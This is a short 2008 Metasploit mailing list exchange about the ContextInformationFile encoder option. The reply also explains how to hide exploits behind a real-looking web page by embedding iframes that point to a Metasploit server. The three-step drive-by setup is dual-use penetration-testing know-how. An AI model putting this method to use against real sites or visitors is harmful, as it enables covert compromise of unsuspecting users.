Metasploit mailing list archives
ContextInformationFile
From: hdm at metasploit.com (H D Moore)
Date: Fri, 12 Dec 2008 21:55:09 -0600
On Friday 12 December 2008, jeffs wrote:
I'm guessing that ContextInformationFile has nothing to do with decoy data sent along in an http type of exploit, like a decoy html page that looks real whilst the exploit is working in the background. Many of these exploits have no method of including a real page of data other than the exploit code, right?
ContextInformationFile is an encoder option, it has nothing to do with the exploits, take a look at: http://uninformed.org/?v=9&a=3&t=sumry
Can the URIPATH actually have some real meat to it?
No, but thats not the way to hide exploits in real pages. Basically, what you would do is: 1) Setup a real web server with whatever content you want. 2) Setup metasploit with whatever exploits/payloads you want, choosing or writing down what URIs go to which exploit 3) On your real web server, add <iframe src="http://msf:8080/URIPATH">'s -HD
Current thread:
- ContextInformationFile jeffs (Dec 12)
- ContextInformationFile H D Moore (Dec 12)